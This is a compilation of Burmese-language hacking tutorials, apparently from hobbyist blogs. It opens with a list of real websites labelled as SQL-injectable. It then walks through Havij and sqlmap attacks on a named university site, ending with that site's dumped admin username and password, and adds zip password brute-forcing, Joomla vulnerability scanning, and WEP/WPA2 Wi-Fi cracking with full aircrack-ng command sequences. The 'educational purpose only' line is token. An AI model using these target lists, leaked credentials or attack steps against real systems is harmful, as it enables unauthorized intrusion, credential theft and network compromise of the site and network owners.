http://www.aquasignal.info/us/cms/htdocs/main.php?id=209'

http://www.kudosshowers.co.uk/gallery.php?id=3'









http://ultimatehomedesign.com/news-detail.php?id=312'

http://www.beemabuild.co.uk/view_product.php?id=258'

http://www.whatwhenwhere.ie/event.php?id=382'


http://www.wcac.org/show.php?id=1'

http://www.ebambi.com/profile_view.php?id=100000252'

http://www.polkatheatre.com/event.php?id=43'


http://www.melbournefineart.com.au/gallery.php?id=18'



http://www.uni-saarland.de/fak3/fr36/sites/institut/person.php?id=1'


http://www.techvision.co.uk/news.php?id=45'

http://www.nihonmono.com/prod_detail.php?id=11000384'

http://www.nissi-beach.com/section.php?id=13'



http://asptt.com/running-tour/participant.php?id=14785'



http://www.widescreenreview.com/news_detail.php?id=19267'

http://lucklyinthebox.com/productinfo.php?id=1155'

http://association.cqu.edu.au/cqusa_faq/php/view-faq.php?id=51'




http://www.4wdsystems.com.au/index.php?id=29'

အထကးပါ Vuln ကးဘးဆကးမာစာရငးသညး H1N1 Hacker ဆမြေဖၚပထာခငးဖစးပါသညး

SQL Injection Attack က Software သ၍ပလပးခငး SQL Injection ကေဆာ သ၍ပလပးလ ြငးရပါေသသညး။ေဆာ ကေတာသနတးကးဆငးတအေခအေနတစး

ခမြာေရထာတာေႀကာငးဆကးတငးေတာစမးသပးလရမညးမဟတးပါ။ကေနားတ Havij ဟေသာ Tool ကစမး

သပးပ SQL attack လပးႀကညးပါမယး။Havij သပ ေအာငးမငးေနသမာစျာရြပါတယး။SQL Injection အ

တျကးလအပးတ Tools ေတျ ကကေနားေအာကးမြာ Download ေပပါမယး။ ပထမဆ Havij က Download

ဆျပါ။ပေတာ SQL Vuln ရြေနတ ကးဘးဆကးတစးခက Havij ရ Target ထမြာထညးပါ။ပနမနာပထာပါတယး

ႊTarget ေနရာမြာ မမ လပးခငးတ SQL vunl ဖစးတဆကးကထညးပါ။ပေတာ Analyze ကနြပးပါ။

ေအာကးပါပမြာ Scann ဖတးေနပေနာကးဆ Current Database ေပၚပ Table ေလေပၚလာပါမယး။

အထကးပါပမြာ Table ေလေပၚလာရငးနြပးပါ ။Main Table တစးခေတျမြာပါ။အခဒဆကးမြာေတာ Main Table

က flashin_sparkms ပါ Get Table ခလပးကထပးနြပးပါ။Get tableကနြပးလကးတအခါမြာ User Table ,

Admin Table စသဖငး Table မာေတျ ႀကရမြာပါ။မမလခငးတ Admin Table ဖစးဖစး User Table

ကဖစးဖစးအမြတးခစးလကးပါ။ပေတာ GET Column ကနြပးပါ။ေအာကးမြာပပထာပါတယး။

GET Columns ကနြပးအပမြာ Password Column ေတျ Id column ေတျေတျ ရမြာပါ။အဒါေတျထမြာပကးဆ

ကးေတျရြေနနငးတာမ အမြနးခစးပ Get data ကနြပးလကးပါ

အဒအခါမြာ Admin ,user ,Id ေတျရ Username .Password ေတျကရရြပါပ။မမ၇ရြလာတပကးဆကးမာ

က ပနးငးဖ မမတာဂတးဆကးရ Login page မေတျ ပါက Havij မြာ Find Admin ဆတာပါပါတယး။

ရြာႀကညးပ၊ Login page က ငးေရာကးနငးပါပ။

Havij န Pen test လပးခငးဒမြာပပါပ။စတးရြညးလကးရြညးနစမးသပးဖကေတာမမတာ နးပါ။

Back Track ၏ SQL Map ကအသပ၍ SQL Inject ပလပးခငး

ကေနားတအခ Back Track ကးသပ SQL Injection တစးခလပးႀကညးႀကမယး။

1.ပထမဆေအာကးပါ SQL Vuln ရြေနတဆကးတစးခကေရျ လကးတယး။

http://www.hu.edu.pk/viewfaculty.php?id=12

2.ပေတာ BT ရ Terminal မြာ cd /pentest/database/sqlmap လရကးပါမယး

3.ေအာကးက ကျနးမနးရကးပါ။မမတာဂတးထညးပါ

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12

-u is the vulnerable url အတျကးရညးညႊနးပါတယး။ေအာကးပါ Command မာကလဆကးရကးသျာပါ

http://4.bp.blogspot.com/-cK5PUcbgC4w/TxW0Yw1nTBI/AAAAAAAAAJc/mgGgbqSnJNY/s1600/Screenshot.png

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 --dbs

or

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 --current-db

ကေနားတက --dbs ကသတသေဘာက ဆကးနျယးတေဒတာေဘကပခငးတသေဘာပါ

--current-db ကသမယးဆရငးေတာ သကးဆငးတအဓကတစးခကသာပမြာပါ

http://3.bp.blogspot.com/-Is3H2E7loCg/TxW0ePFD4HI/AAAAAAAAAJk/59YpWSVlheI/s1600/Screenshot-1.png

http://1.bp.blogspot.com/-qOR-_-rzqIk/TxW0iNqvuTI/AAAAAAAAAJs/7w9_2OvNVHw/s1600/Screenshot-2.png

ကေနားတအခ Current databaseဆပ Data Base Name တစးခရပါပ။ဒမြာေတာ c3recults ပါ။မမတာဂတးအလကးနာမညးေပာငးနငးပါတယး။Command မြာမမ Database name ကေပာငးသပါ

ေအာကးပါ Command ကရကးပါ

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results --tables

-- table ကထညးတသေဘာက ကးဘးဆကးထက Tableေတျကဆျေခၚလကးတာပါ။

http://2.bp.blogspot.com/-ypKUdZG20Z4/TxW0lz4qwUI/AAAAAAAAAJ0/L2O6xv60d80/s1600/Screenshot-3.png

http://1.bp.blogspot.com/-ZAotGeWG520/TxW0ouN-dpI/AAAAAAAAAJ8/AqQY4Fk3_Z4/s1600/Screenshot-4.png

Admin Cloumnကရဖေအာကးပါ Command ကသသျာပါတယး။

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results -T admin --columns

အခဆကေနားတတာဂတးရ Name ေတျကရပါပ ….

ေအာကးပါ Command ကဆကးရကးပါ Admin ,Id ,Password ေတျကေခၚတာဖစးပါတယး

http://3.bp.blogspot.com/-MPML9oLlQtI/TxW0sBDTFgI/AAAAAAAAAKE/rY02_72J1Dg/s1600/Screenshot-5.png

http://3.bp.blogspot.com/-MPML9oLlQtI/TxW0sBDTFgI/AAAAAAAAAKE/rY02_72J1Dg/s1600/Screenshot-5.png

http://3.bp.blogspot.com/-dwh6lyxbe98/TxW0vQdo63I/AAAAAAAAAKM/5hzG_30qwjk/s1600/Screenshot-6.png

./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results -T admin -C

id,passwrd,u_name --dump

ေနာကးဆမြာကေနားတ Admin user+password ကရရြလကးပါတယး။

http://2.bp.blogspot.com/-mmjl6RbfjKM/TxW0y-5PZDI/AAAAAAAAAKU/rWaNwCpuAAE/s1600/Screenshot-7.png

http://1.bp.blogspot.com/-AIOKYQeQ7i4/TxW02YBCTqI/AAAAAAAAAKc/4xqRy2_lcjA/s1600/Screenshot-8.png

ေအာကးမြာပထာတာေတာ ကေနားတ Pen Test လပးလရလာတ Admin acessပါပ

Database Name : c3results

No of tables :48

Admin Table Name : admin

admin username : 123_admin_123

admin password : 123_hazara_123

………………………………………………………………………………………………..

Countermeasures From SQL Attack (SQL Attackရနးမြကာကျယးနညးမာ)

CEH ထကပမာဖငးတကးရကးေဖၚပေပထာပါတယး။ပမြပထာတာရြငးလ Beginnerမာအတျကးေတာ

Knowledge အဖစးသထာရငးလေလာကးပါတယး။

……………………………………………………………………………………………………………………………………….

REF:က Brb (Planet Creator),You Tube,Back Track

Forum,H1n1 (mmcyberdevils),all ItemZ,CEH7,Google

Special Thz to: (G Tone MHU) ၊ BHG၊Myanmar Cyber Army၊

SQL Injection နပါတးသတးေသာ Video မာႀကညးရနး

Sql injection attack Videos

http://www.youtube.com/watch?v=h-9rHTLHJTY

http://www.youtube.com/watch?v=jMQ2wdOmMIA

http://www.youtube.com/watch?v=PB7hWlqTSqs

http://www.youtube.com/topic/QJnLFoEO7Fs/?feature=results_main

http://www.youtube.com/watch?v=bORZlmyDw0s

http://www.youtube.com/watch?v=JqzWPLq7bJY

http://www.youtube.com/watch?v=0z1rt9Y-ON0

http://www.youtube.com/watch?v=qELByGfNJSE

Havij အသပနညး Videos

http://www.youtube.com/watch?v=Qvhdz8yE_po

http://www.youtube.com/watch?v=DMcaqCGHUVc

http://www.youtube.com/watch?v=JdgE7MSsBTc

http://www.youtube.com/watch?v=Ck5bifmAjZk

SQL injection with Back Track Videos

http://www.youtube.com/watch?v=ViezR1Qmcns

http://www.youtube.com/watch?v=hANMjTqFLD8

http://www.youtube.com/watch?v=-F1nBasky6E

http://www.youtube.com/watch?v=2cKJ5l9qYE0

http://www.youtube.com/watch?v=TqvLMWNTBYU

Havij Download ::::::: http://www.mediafire.com/download.php?r3ey1g20q1y69ka

SQL Injection နညးဟာစတးရြညးသခမြနဖတးထဥာဏးေပၚမြာမတညးပေအာငးမငးတတးပါတယး။

နာမလညးလႀကစာပဖတးႀကညးႀကပါ။မသတာကေကားမဖတးပါနတဆငးခငးေအာငးမငးေအာငးႀကစာ

ႀကညးပါ။တစးဆကးမရတစးဆကးစမးသပးႀကညးပါ။မေလာပါန။မရရငးစတးမပကးပါန၊လကးမေလာပါန။

Video မာက Download ဆျပေသခာေလလာႀကပါဥ၊ကေနားေပထာတ Videoမာကႀကညးပါက

ဘယးသ ကမြေမစရာမလပဆရာတစးေယာကးကအနကပးလာပသငးႀကာေပေနသလခစာရမြာပါ။

Black Attack လပးေတာမယးဆရငး Cyber Law ကသတရြႀကပါခငးဗာ။Educational Purpose Only ဖစး

လ Attacking နပါတးသတးပ မမစမးသပးမမတာနးသာဖစးပါသညး။

စာဖတးသမာအာအစဥးေလစာလကး

http://www.youtube.com/watch?v=TqvLMWNTBYU

စေဆာငးတငးပသ - 3thic0kiddi3 (Ethic Kiddie) www.ethickiddie.blogspot.com

[email protected]

ထျကးရြပေသာစာအပးမာ

1.Wifi hacking basic

2.DNN hacking Basic

3.IIS Hacking Basic

4.Network Hacking Basic

5.Loic Tool DDOS Basic

6.SQL Injection Basic

http://www.ethickiddie.blogspot.com/

Using Fcrackzip on Backtrack 5 Posted by Aung Kyaw Moe

အခ ကၽြနေတာ Backtrack မာပါတ tool တစခ အရမးအသးငတ tool တစခေပါ အအေၾကာငးက ကၽြနေတာေရးေပးလကပါတယ Fcrackzip ပါ သက နာမညအတငးပ zip ဖင password ေတြက

ျဖညတ tool ေလးတစခပါ တစခကၾကညလကရေအာင

ဖငအသစတစခကေဆာကပါမယ ပမာျပထားပါတယ……….

အခ wine ေအာကက rar ကေန အေစာကဖငအသစေဆာကထားတာေလးက zip လပပါမယ…………….

.



rar ကေနတစဆင ခဏက txt ဖငေလးက zip လပပါမယ ပမာျပထားပါတယ


ေနာက Advance ကေရြးျပ password က ကယၾကကတာထညလကပါ စမးမာဆေတာ ဿ-၆လးၾကားထညရငပအဆငေျပပါတယ…………..:P ပမာျပထားပါတယ……ကယၾကကတ pass ေပးျပးရင ok လကပါ သးရတာလြယေအာင Desktop ေပၚမာပထားပါေနာ……….


ေနာက fcrackzip ရတေနရာကသြားပါမယ သက Application>Backtrack>Privilege Escalation>Password Attack>Offline Attack>Fcarckzip ပါ ေနာက သက Forensics tool ထမာလညးပါပါတယ အစလကၾကရေအာင……..ပမာၾကညပါ


fcrackzip ကဖြငလကပါ သ႕ရ႕ usage ကလာပါလမမယ………..ပမာျပထားပါတယ…………


က စလကၾကရေအာင သ႕ရ႕ Useage commend ကေတာ fcrackzip -b -c a -l 1-5 -u /root/Desktop/hello.zip ပါ ဒေနရာမာနညးနညးေလရညခငပါတယ ဟတစေန႕က ကၽြနေတာတ႕ Group ထမာ ေမးထားတေမးခြနးက negative က ျပနေျဖထားတာေတြ႕ပါတယ အထက ဒါက brute force attack ပါ……… အအေၾကာငးကေတာ negative လညးေျပာျပးသားဆေတာ ကၽြနေတာလညးထပမေျပာေတာဘး အအေပၚက command ေလးက ေပးလကရေအာင……..ပမာျပထားပါတယ…………:P


Password Found!!!!!!!!!!! pw= aung တ ျမနတယေနာ သက ဿ-၆လးၾကားဆအရမးျမနပါတယ နနPassword ကရညေလ နနၾကာေလပါပ အခေတာ စကန႕ပငးေလာကပၾကာပါတယ

အမားဆးေပးတာကလညး zip password ေတြက ၆လးေလာကအထပေပးၾကတာမားပါတယ တစခ႕ဆဒေတြက သ႕ဆဒနာမညေတြေပးၾကာပါတယ ကမနမမနျဖညၾကညရေအာင ……………:P


ကေျဖလကပါမယ ok ေပါေနာ ရမရေအာကမာၾကညရေအာင……….:P



ေကးဇးတငပါတယ ဆကလကၾကးစားပါဥးမယ ဒထက ေကာငးတ ပ႕စေတြ Tool Tutorial ေတြေရးေပးခငေသာလညး ပတစပတငဖ႕ေတာင အႏငႏငျဖစေနလ႕

ကြနေကာငးဖ႕ပဆေတာငးေနရပါတယ

Using Joomscan in Backtrack 5 R3 Posted by Aung Kyaw Moe

အခ Backtrack မာပါတ Joomscan အေျကာငးေလးတငျပပါမယ အဒါကေတာ ကြနေတာတျမနမာနငငကေရးထားတာပါ YGN Ethical Hacker Group ကေနထတထားတ tool ပါ ကေအာငခနေရးထားတာပါ ကြနေတာတျမနမာေတြလညးစြမးပါတယေနာ Backtrack ထမာ Tool တစခပါတာဂဏယစရာပေလေနာ

စရေအာင Joomscan ကသးမာဆေတာသအေျကာငးေလးနညးနညးေျပာပါမယ သက Joomla အေျခခထားတဆဒေတြက ေပါကမေပါကစစတ tool ပါ အတစခေျပာအးမယ ဟတစေလာတနးက ဘဂါလဆဒေတြတကတနးကဒါေလးကေတာေတာက အသးငတာဂာ ဟးဟး ကစရေအာင ပထမဆး joomscan ကဖြငလကပါ

ဖြငျပးရငျမငရမယပပါ အရငဆး update လပဖအျကေပးေစခငပါတယ ကြနေတာကေတာလပျပးသားပါ


http://ghostarea.net/2013/01/31/using-joomscan-in-backtrack-5-r3/screenshot-7-8/

ေအာကေတာသရ option ပါ

http://ghostarea.net/2013/01/31/using-joomscan-in-backtrack-5-r3/1-9/

ေနာက ဆဒတစခကရာပါမယ joomla အသးျပတဆဒေပါ powered by joomla 1.5 ဘာညာေပါ google မာရာလကပါ



ကတစခေရြးလကပါေနာ ေရြးျပးရငစျပး scan ဖတရေအာင သ command ေတြကေတာ ./joomscan.pl -u www.victim.com ပါ ေအာကမာျကညပါ

ေနာကေအာကကပကေတာ scan စ ဖတတပပါ


ေအာကကပကေတာ scan ဖတျပးသြားတပပါ vuln 5 ခေတြ႕ပါတယတ ေပာထာ………:P

http://ghostarea.net/2013/01/31/using-joomscan-in-backtrack-5-r3/joomscan-2/

ကဘယဟာေတြေပါကေနလ ၾကညရေအာင အေပၚက scroll up လကပါဗာ အမာ vuln မာ yes လ႕ျပထားပါတယ

က ပထမဆး vuln ျဖစတ /htaccess.txt ကဖြငၾကညရေအာင

http://ghostarea.net/2013/01/31/using-joomscan-in-backtrack-5-r3/joomscan2/


က ဒေလာကပလပျပပါမယ ေနာက vuln ေတြကေတာ ကယဘာသာ ဆကျပး စမးၾကညလကပါေနာ

ဆကလကၾကးစားပါအးမယ

ေအာငေကာမး


10100101010101010101011010101

01010101010101010101001010101

01010101010101010101010101011

01010110101001010101001010010

10010100101010101010101010101

01010101010101010101010101010

10101010101010101010101010101

01010101010101101010101010101

01011010101010101010101010101

01010101010101010101010101010

10101010101010101010101010101

01010101010101010101010101001

01010101010010101010010101010

01101010010101010101010101010

10110101010101010101010101010

10101010101010101010101010100

10vbnmqwertyuiopasdfghjklzxcvbnm

WiFi Internet Connection Hacking

WEP,WPA2 Penetration Testing

5/27/2012 For Myanmar IT Begineers (Myanmar version)

3thic0kiddi3

Wifi Hacking Basic By 3thic0kiddi3

ကေနားတနငးငမြာ ငးဖငးလငးေတျေပါလာပါပ၊ဒါေပမယးအနညးငယးေစမငးေနေသတာေႀကာငး

လတငးမသနငးေသဖ၊လငယးေတျအတျကး(တကယးေလလာသ)အငးတာနကးလငးဆတာေတာငးတ

မႀကမြာပ။ယခစာအပးက ငးဖငးခယသစျဖ သငးေပတစာအပးမဟတးပါ။ေဖါကးလရတယး။ပေတာဘယးလကာ

ကျယးမယးဆတာကရြငးပထာတာေလပါ။Educational Purpose Only ဖစးပါတယး။ဒနညးပညာကတတးသျာ

တငး ငးဖငးလငးအာလကေဖါကးနငးမယးလေတာမဆလပါ။အနညးငယးနာလညးသျာပါလမးမညး။ဒစာအပး

က Beginner Level နြငးလကး၍ေရသာထာပါသညး။ကယးေတျ သငးခနးစာမာနြငးအျနးလငးသငးခနးစာမာစ

ေပါငး၍တညးဖတးထာပါသညး။တတနြငးလရငးကသာေဖၚပသျာပါမညး။WEP ေရာ WPA ပါဟကးနညးကေဖၚ

ပထာပါသညး။

ဒစာအပးအတျကးစကာလကးေဆာငး

“တစးလပးစာဖသေကဇ အထမေမအပး”

မေကာငးမြဟသညးဆတးကျယးရာမရြ…..

လအပးေသာပစၥညးမာစတငးစေဆာငးခငး

Laptop တစးလ၊ Xp ဖစးဖစး 7 ဖစးဖစးတငးထာပါရပါသညး။ပေတာ Wireless USB adapter တစးခ၊

TP-Link Wireless adapter သညးယခစာေရေနခနးတျငး 15000ကပးခနးရြသညး။

(Laptop တျငးလ Wireless ပါရမညး)။လအပးေသာေဆာ Back Track 5 , VM ware ဒါပါပ။

(လအပးေသာေဆာ ေဒါငးလပးဆျရနး အငးတာနကးရြလြငးပေကာငးမညး :P)။မရြပါကလအငးတာနကးဆငး

တျငးအသပ၍ေဒါငးလပးဆျနငးပါသညး။

စတငးပငးဆငးပ

Laptop ကဖျငးပါ။ပေတာ လအပးတေဆာ ေတျကေဒါင းလပးဆျဖ Browser တစးခခဖျငးပါ။

Back Track 5 က www.backtrack-linux.org မြာေဒါငးလပးဆျပါမယး။အခဒစာေရေနတအခနးမြာ

Back Track က 5R2 ေတာငးထျကးေနပါပ။အခ Back Track 5 ဖငးပသျာပါမယး။Download လပးဖ

သေတာငးတေဒတာေတျမထညးလရပါတယး။ပပါအတငး GNOME ၊ 32 Bit ၊VM Ware၊ Direct ကေရျ ပါ။

ေဒါငးလပးဆျပါလမးမညး။ကေနားေဒါငးလပးဆျခတနးကအငးတာနကးဆငးမြာပါ။ ၇နာရေလာကးႀကာတယး။

ေဒါငးလပးဆျဖ အတျကးအငးတာနကးဆငးနခငးရငးေတာဆျခငးထာလရတာေပါေနား။အဒေလာကးႀကာလ

စတးပကးမသျာပါန၊ဇျေလာရငးဘာမြလပးတတးမြာမဟတးေတာဖ။Back Track 5ကရလာတာန Zip

ဖညးလကးပါ။ပေတာ VM ware ကေဒါငးလပးလပးဖ www.vmware.com/products/player က

သျာပါ။ေဒါင းလပးဆျပ VM ware ကစကးမြာအငးစေတာလပးပါ။

http://www.backtrack-linux.org/

VM ware က Install လပးရတာလျယးပါတယးအခာေဆာ မာနညးတပါပ။အငးစေတာလပးပပပါအတငး

File >open virtual machine ကေရျ ပါ ။မမကျနးပတာထက Back Track 5 zip ကဖညးထာတာကေရျ

လကးပါ။

ပရငး Play Virtual Machine ကနြပးပ Back Track 5 ကစတငးေမာငးနြငးလကးပါ။Back Track က Boot လပး

ေနတာေတျ ပါလမးမယး။ပမြာ Boot လပးေနပကႀကညးပါ။

Boot လပးေနရငး Bt login ေတာငးပါလမးမယး။ bt login က root လထညးပါ။ Password က toor လထညးပါ။

ပရငး root@bt မြာ startx လရကးပါ ဒါဆ VM Ware ထမြာ BT 5 တငးပပါပ။ပမြာတငးပပကႀကညးပါ။

ဒါဆ ကေနားတ Windows 7 သေနရငးန Back

Track 5 သနငးပါပ။Back Track ဆတာ Linux အႏျယး ငးတစးခပါ Security သမာေရာ၊ Hacker

ေတျပါအသပေနႀကပါတယး။Linux ေလလာေနသမာအတျကး Back Track ကအေထာကးအကေပမြာပါ။

ငးဖငးလငးတစးခဟကးႀကညးခငး (WEP Cracking)

Wifi လငးေတျကမာေသာအာဖငး WEP လငး WPA လငး WPA2 လငးဆတာရြႀကပါတယး။

အရြညးေကာကးေတျသခငးရငးေတာ Google မြာရြာဖတးလကးႀကပါ။Beginner တစးေယာကးအဖ ကေတာ WEP

တ WPA တမသႀကေပမယးပသနာမဟတးပါ။WEP ကေဖါကးရလျယးပါတယး။ေဆာ ေတျနညးလမးေတျမာ

ႀကရြပါတယး။မမေဖါကးထျငးမယးပတး နးကငးမြာ WEP လငးရြလကေတာ ေပားရမြာပါ။လကးေတာကငးဖငး

Connector ေလကေထာကးႀကညးတာန အနနာကငးဖငးလငးေတျေပၚေနတာေတျမြာ ပါ။အဒလငးေတျက

ေထာကးႀကညးရငးဖငး ဘယးလငးကေတာ WEP,ဘယးလငးကေတာ WPA2-PSK ဆတာပေနမြာပါ။အခ

ကေနားတ ငးဖငးဟကးဖ အတျကး Wireless USB adapter က လကးေတာမြာတပးဆငးလကးပါ။VM ware

န Back Track 5 ကဖျငးထာလကးပါ။Back Track က Terminal ကဖျငးပါ ပမြာပထာပါတယး။Terminal

ဆတာ Windows က cmd နသေဘာတရာတပါတယး။Command ရကးလရတေနရာပါ။

ပထမဆ Command ရကးပါမယး။

airmon-ng လ ရကးပါ Enter ေခါကးပါ။အဒမြာ Interface ,Chipset တေအာကးမြာ wlan0 လ adapter

ရ detail တစးေႀကာငးကပပါလမးမယး။အဒါဆ Adapter က BT5 ကသပါပ။ဆကးလပးလ ရပါပ။

ဒတယ Command ရကးပါမယး။ airmon-ng start wlan0 ပါ Enter ေခါကးပါ။ ေနာကးတစးေႀကာငး

တတယ Command ရကးပါမယး။ airodump-ng mon0 ပါ Enter ေခါကးပါ။အဒ ကျနးမနးကရကးတာန ကယး

အနနာက ငးဖငးလငးမြနးသမြပပါပ။အဒမြာ ဘယးလငးကေတာဖငး WEP ဘယးလငးကေတာ WPA2

ဆတာပေနမြာပါ သငးရ Target wifi လငးက WEP ပါ (WPA hack ကေနာကးတျငးေဖၚပမညး)။သငးေဖါကးခငး

တ WEP လငးတစးခခကေရျ လကးပါ။

ကေနားထမြာေတာ laptopdct ဆတလငးက WEP လငးဗ။ကနးတ ငးဖငးလငးေတျက WPA2 လငးေတျခညး

ဒေတာ ကေနးာ Laptopdct ဆတလငးကေဖါကးႀကညးမယး။သနပါတးသတးတ BSSID နပါတးေတျကပါ။

C8:3A:35:2F:E7:30 ပါ။လငးတစးခနတစးခ BSSID မတပါခငးဗ။ပေတာ CH ကမြတးပါ CH ဆတာ Channel

ပါ။laptopdct ရ Channel (CH) က 11 ဖစးပါတယး။ပရငး Command ေနာကးတစးေႀကာငးရကးပါမယး။

ကျနးမနးက airodump-ng –w –tuan –c 11 --bssid C8:3A:35:2F:E7:30 mon0 ပါ။

ဒေနရာမြာ tuan ဆတာဖငးနမး (File name) ပါႀကကးတနာမညးထညးလရပါတယး။ -c ရေနာကးမြာေတာမမ

Terget ရ CH နပါတးကထညးရပါမယး။ C8:3A:35:2F:E7:30 ရ ေနရာမြာလ မမ Terget ရ BSSID ကထညး

ရပါမယး။ပရငး Enter ေခါကးပါ။အဒအခါ ကယး Target ရလငး Data အေနအထာသသနးေပၚလာပါမယး။

ပမြာႀကညးပါ။

ပရငး Terminal အသစးေခၚပါ။ aireplay-ng -1 0 -a C8:3A:35:2F:E7:30 mon0 လရကး

Enter ေခါကး။အဒအခါမမ Request ေတျက Send လပးတာေတျ ရမယး (sending auth)။ပရငးေနာကး

Command တစးေႀကာငးထပးရကးမယး

aireplay-ng -3 -b C8:3A:35:2F:E7:30 mon0 လရကးပါမယး။ထ အခါကယး ပတ Request ဖငးေတျက

Read လပးေနတာေတျပါလမးမယး။Read ရတာမာေလေလ ကယးတာဂတးရ Data တကးလာေလေလ

ကယး Target ရလငးထကလာေလေလဖစးလာပါတယး။ပမြာပထာပါတယး။

Data မာမာတကးလာေအာငးေစာငးပါ။ေဖါကးဖအချငးေရပေကာငးပါတယး။ဒေနရာမြာ C8:3A:35:2F:E7:30

ကအေသမြတးမထာနလငးေပၚမတညးပ BSSID ေပာငးပါတယး။ပေတာ Aireplay command ေတျမြာ

-1 တ 0 တမရရငး အခာကနးဂဏနးမာထညးစမးႀကညးပါ ဥပမာ 2တ 3 တ ေပါ။တာဂတးရ အေခေန

ေပၚမတညးပအနညးငယးလကးေပာငးနငးပါတယး။သေဘာတရာခငးကေတာတတပါပ။ပမြာ Command

ဿေႀကာငးရကးအပ Data ေတျတကးလာတာကေတျ ရမြာပါ။ေပားဖေကာငးမြာပါ။ကေနာကးဆအဆငးကေရာကး

ပါပ။Data ေတားေတားေလလတကးလာပဆရငး Read packet ေတျလေတားေတားဖတးေနပဆရငး Crack လ

ရေလာကးပါပ aircrack-ng tuan-01.cap လရကးပါ။ေစာေစာကကေနားေပာခသလပ ။Tuan ေနရာမြာႀကကး

တနာမညးထာထနငးတယး။ဒေတာကာ ေစာေစာက tuan ေနရာမြာ အခာနာမညးေပခသေတျက အခာနာ

မညးပနးထညးရပါမယး။ဥပမာ ethickiddie ဆရငး Command က aircrack-ng ethickiddie-01.cap ပါ။

မမဘာနာမညးေပခလညးမသရငး Terminal မြာ ls လ ရကးပႀကညးလရပါတယး။ပမြာ aircrack ကျနးမနး

ကရကးလကးပါပ Opening tuan-01.cap က Crack လပးေနပါပ။

ေနာကးဆမြာေတာ Aircrack ကပကးဆကးေတျကအလလရြာေပေနပါလမးမယး။Key Found

ဆရငးေတာအေတားေပားရမြာပါ။ပမြာ Key ကCrack လပးပေအာငးမငးတပပါ။

ကေနားခရရြတ Key က 3132333132 ပါ ။အဒါမမ Target ရ Password ပါပ။တစးခါတရမြာ။Key က

A3:B5:C11:34:U7:F8:9Q:33 အစရြသဖငးပပါလမးမယးဒါဆ ပကးဆကးက A3B5C1134U7F89Q33 ပါ

WEP Cracking ပပါပ။

WEP ပငးရြငးမာလခေစရနး

Wifi လငးပငးရြငးမာအေနဖငး မမလငးက WEP ဖစးေနရငး WPA2 သေပာငးလသသငးပါတယး။

WEP ဟာေဖါကးဖ ရာလျယးကေနပါပ။ပေတာ မမလငးက BSSID ေဖာကးထာခငးဖငးလကာကျယး

နငးပါလမးမယး။မမအငးတာနကးလငးေလလျနးလာပဆ Restart ခပါ။မမ Network အတျငးမြာ ခတးဆကး

ေနတကျနးပတာမာပမြနးဟတးမဟတးေလလာပါ။နကး ကးမြာလာေရာကး Crack လပးတ Computer

မာရ Mac address က Filter လပးပစးပါ။ဒါမြမရရငး ေပသလကးပါ။သနာပါတယးဗာ။

…………………………………………………………………………………………………………………………………………

WPA2 Cracking (အနညးငယးခကးေသာလငးအာခရကးလပးခငး)

နညးလမး()

WEP ရသေဘာတရာအတငးဆငးတပါတယး။ဒါေပမယး WPA ကလခေရတငးကပးတယး။ဆရာဆရာဟကး

ကာႀကေတျေတာငးမြေခ ျ ပနးေလာကးတ.ယး။WPA2 က ဟကးဖ က Packet Sniffing လပးမလာ?Dictionary

attack နလပးမလာဆတာပါပ Beginner ေတျအတျကးကေတာ Dictionary attack ကအသငးေတားဆပါ။

Packet Sniffing ကကေနားေနာကးေတာေရပါမယး။Dictionary attack ကေတာရရြငးတနညးတစးခပါ

မမေဖါကးမယးလငးရ password က မမမြာရြတ Wordlist နတကးဆငးယပ Crack ယတာပါ။

WPA2 ကအဒနညးနေဖါကးနငးပါတယး။ဒါေပမယး special character ေတျပါတ Strong ဖစးတ Password

ေတျကေတျ ရတအခါအခနးေပရပါတယး။မမမြာ wordlist ေတျမာမာရြရငးေတာ ခရကးတအခါအဆငးေပ

ပါတယး။WPA2 က Dictionary att နတကးဖစတးရြညးရပါမယး။ရပးပစးလမရဖဆကးတကးတကးခကးေနရမယး။

ကေကာငးမြရတတးသလ ခဏေလရသျာတာမရြပါတယး။မမ Target ကပကးဆကးရရြငးေလေတျထာ

ရငးေတာ ကေကာငးတာေပါ ခဏေလန ေဖါကးနငးပါမယး။wordlist ေတျကအငးတာနကးေပၚမြာေဒါင းလပး

ဆျယနငးပါတယး နာမညးႀက wordlist ေတျကေတာ 1.1million wordlist.txt န darkc0de.lst တပါ။

Googleမြာလ WPA2 Crack wordlists လရြာပေဒါငးလပးဆျနငးပါေသတယး။

4shareမြာလရြာဆျနငးပါတ.ယး။အခေတာ 1.1 million wordlist န darkc0de.lst ကအသပပပါမယး။

(1)1.1million wordlist.txt download

http://www.4shared.com/office/tvijWEkA/11million_word_list.html

(2)darkc0de.lst download

http://www.4shared.com/file/AF3e-0Em/darkc0de.html

ပထမဥဆ Back Track 5 ကပနးဖျငးပါ။ေဒါငးလပးဆျလရရြလာတ 1.1 million list န darkc0de ဖငးဿဖငး

က Backtrack 5ထသ ေမာကးစးဖငးဆျယလကးပါ(move)လပးလကးတာဖစးပါတယး။ပမြာပထာပါတယး။

Windows desktop ကေနဆျယလကးတာပါ။

Command box (terminal) ကဖျငးပါ။ airmon-ng ရကးပါ Enter ေခါကးပါ။ပမြာပထာပါတယး။မမ

Adapter Name ကပရငးဆကးသျာလရပါပ။

ေနာကး Command က airmon-ng start wlan0 ပါ Enter ေခါကးပါ။

ေနာကးCommand က airodump-ng mon0 ပါ Enter ေခါကးလကးရငး မမအနကငးဖငးလငးမာက

ေဖၚပေနပါမညး။မမဟကးခငးတလငးတစးခ (WPA2-PSK) လငးတစးခခကေရျ ခယးလကးပါ။

ကေနားထမြာေတာတလငးပရြတယး Backt ဆတလငးပါ။ WPA2-CCMP-PSk ပါ။

ပမြာပထာပါတယး။

ကေနားေဖါကးမယး Backt လငးရ BSSID က F8:DB:7F:46:1D:A1 ဖစးပါတယး။ Channel (CH)က 1 ပါ။

မမ Target ရData ကေသခာေကားပလပးထာပါ။ပရငးေနာကး Command ရကးပါပ။

airodump-ng -w WPACap -c 1 mon0 ပါ WPACap ေနရာမြာ မမနြစးသကးရာဖငးနမးကထညးပါ။

-c ေနာကးက 1 ဆတာ Channel no.ပါ။ပမြာပထာပါတယး။

ပရငးေနာကး Command ရကးပါမယး။Terminal အသစးတစးခဖျငးပါ။

